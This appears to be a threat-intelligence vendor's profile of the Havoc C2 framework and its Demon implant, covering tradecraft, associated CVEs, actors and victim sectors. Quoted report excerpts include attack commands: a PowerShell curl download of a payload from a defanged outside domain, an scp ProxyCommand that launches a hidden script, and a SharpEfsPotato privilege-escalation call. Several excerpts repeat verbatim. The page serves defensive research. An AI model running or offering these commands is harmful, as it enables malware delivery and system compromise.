Havoc is an open-source post-exploitation command-and-control framework whose primary implant, Demon, is widely used in both red-team operations and real-world intrusions. In malicious operations it functions as a Windows-focused remote access implant and operator platform for hands-on-keyboard activity after initial compromise. Observed tradecraft includes in-memory execution through staged loaders, reflective loading, shellcode launchers, and DLL sideloading, as well as deployment from web shells or other footholds on compromised servers and workstations. Havoc has been seen alongside other frameworks such as Cobalt Strike, Sliver, Mythic, and AdaptixC2 in multi-tool intrusion sets.
The framework supports command execution, reconnaissance, credential-focused collection, and broader post-exploitation activity. Reporting associates Havoc-enabled intrusions with browser-data theft, keylogging by companion tooling, Active Directory reconnaissance, lateral-movement preparation, and exfiltration of collected data. Operators have also used Havoc in campaigns involving scheduled-task persistence, process injection, and defense-evasion techniques. Variants and derivatives have inherited anti-analysis features associated with Havoc implants, including encrypted memory images, indirect API invocation, and hashed API resolution.
Havoc has appeared in phishing-led compromises using malicious shortcut files, script-based stagers, password-protected archives, trojanized software updates, and multi-stage chains involving VBScript, PowerShell, MSI packages, and signed-binary proxy execution. It has also been deployed after exploitation of public-facing applications and from established web-shell access. Campaign reporting links Havoc use to a diverse set of actors, including financially motivated intrusion operators, access brokers, hacktivist clusters, and Chinese state-directed espionage activity. Victims have included government entities, public services, healthcare, aviation, energy, transportation, IT, software development, and other enterprise environments. Although the framework is cross-platform in concept and is discussed in Linux and macOS operator contexts, the supplied reporting most directly supports active malicious use of the Demon implant on Windows systems.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In April 2026, CheckPoint Research reported that hackers were targeting a zero-day arbitrary file execution flaw in TrueConf, tracked as CVE-2026-3502, compromising users via trojanized client updates. | CheckPoint named the campaign ‘Operation True Chaos,’ and tentatively attributed it to Chinese threat actors behind the Havoc implant, which was used in these attacks.
Researchers at Sophos recently discovered that in mid-2025, Bronze Butler (a.k.a. Tick, RedBaldKnight, Stalker Panda, Swirl Typhoon) exploited a critical vulnerability in Lanscope when it was still a zero-day... Motex disclosed a vulnerability designated CVE-2025-61932... Motex has released a fix... CISA added CVE-2025-61932 to its Known Exploited Vulnerabilities (KEV) catalog.
Attack chains mounted by the adversary have been found to abuse CVE-2025-8088, a now-patched security flaw impacting RARLAB WinRAR that allows for arbitrary code execution when specially crafted archives are opened by targets. The exploitation of the vulnerability was observed about eight days after its public disclosure in August.
19 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.
Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth
The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.
The group uses a combination of living-off-the-land tools (like ligolo, socat, proxychains) and post-exploitation frameworks (like Havoc, MeshCentral, and custom C2 binaries) across Linux and cloud systems.
What once ended with a $300 gift card purchase now ends with a modified Havoc C2 framework burrowed into your environment... deploying a mix of custom Havoc Demon payloads...
"...used to execute the Havoc command-and-control (C2) framework."
28 distinct techniques documented for this family, organized by ATT&CK tactic.
These hashes empower server clustering, identification of unique and similar servers, and the pursuit of malicious actors with heightened confidence.
The most significant aspect of the attack was the attacker's installation of OpenSSH Server and Tailscale on a victim's machine, creating a covert access channel independent of the command-and-control server. Even after the Havoc infrastructure went offline, the attacker maintained access through this separate, encrypted mesh network.
That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.
we successfully phished some of the client staff, and lured them to execute a payload that provided us with Command & Control (C2) access.
scp.exe -o ProxyCommand="powershell -ep bypass -file .\$Recycle.Bin\setup.ps1" ... powershell -NoProfile -Command "curl 'https://verifysecure[.]net/download/stub.exe' -OutFile (Join-Path $env:TEMP 'svc.exe')"
the attackers used the shell to execute commands on the targeted web app server... /c wevtutil qe ... /c WMIC ... findstr /i /c:exclude /c:whitelist /c:blocklist
That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.
The most significant aspect of the attack was the attacker's installation of OpenSSH Server and Tailscale on a victim's machine, creating a covert access channel independent of the command-and-control server. Even after the Havoc infrastructure went offline, the attacker maintained access through this separate, encrypted mesh network.
That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.
After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe
Now that we have a high integrity beacon, we can use the SharpEfsPotato tool to get system ... dotnet inline-execute /home/kali/Desktop/SharpEfsPotato.exe -p C:\Users\User\Downloads\aese.exe ... the last is at System level privileges.
setup.ps1 launches documents.exe (Java packer) → jar.exe; ... The stub.exe Havoc payload was unknown to VirusTotal at time of capture, indicating fresh, in-the-wild tooling.
After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe
the payload deployed to the targets via the phishing was crafted in a way to run the C2 agent code in both Microsoft Edge and Google Chrome browser processes on each victim's host
the threat actor using credentials stolen from an unmanaged device and a dropped web shell. The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL...
including the identification and clustering of C&C HTTP servers for various malware families.
27 Jul 21:20:33 : C2 #1 – Cobalt Strike. Beaconing begins to 35[.]74[.]65[.]92:8012, GET /api/v1/get ...
90 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
93 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An implant reportedly used in a separate TrueConf-targeting campaign called Operation True Chaos, attributed by CheckPoint to Chinese threat actors.
Delivered as stub.exe/svc.exe and used as a later-stage payload for command-and-control. The content notes Havoc Demon includes evasion features such as sleep obfuscation, return-address stack spoofing, and indirect syscalls.
Command-and-control framework mentioned as part of the growing set of C2 tools SOC teams should detect on compromised hosts.
C2 framework/agent referenced as an example payload used after initial access on macOS.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.